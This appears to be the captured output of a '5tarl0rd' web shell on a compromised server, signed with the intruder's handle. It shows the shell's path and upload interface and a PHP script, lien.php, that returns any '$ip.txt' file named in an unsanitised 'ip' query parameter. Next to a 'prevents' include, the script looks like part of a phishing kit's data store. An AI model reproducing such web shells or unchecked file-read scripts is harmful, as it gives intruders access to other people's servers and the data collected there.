5tarl0rd

Current Path : /home/tiporg/.trash/
Upload File :
Current File : /home/tiporg/.trash/lien.php

<?php
require 'prevents/index.php';

if (isset($_GET['ip']) AND !empty($_GET['ip'])) {
    
$ip = $_GET['ip'];
if (file_exists("$ip.txt")) {
    $data = file_get_contents("$ip.txt");
    die($data);
}else{
    die('Nothing');
}



}else{
die("Missing Parameter");
}
?>

5tarL0rd By 5tarl0rd Being Anonymous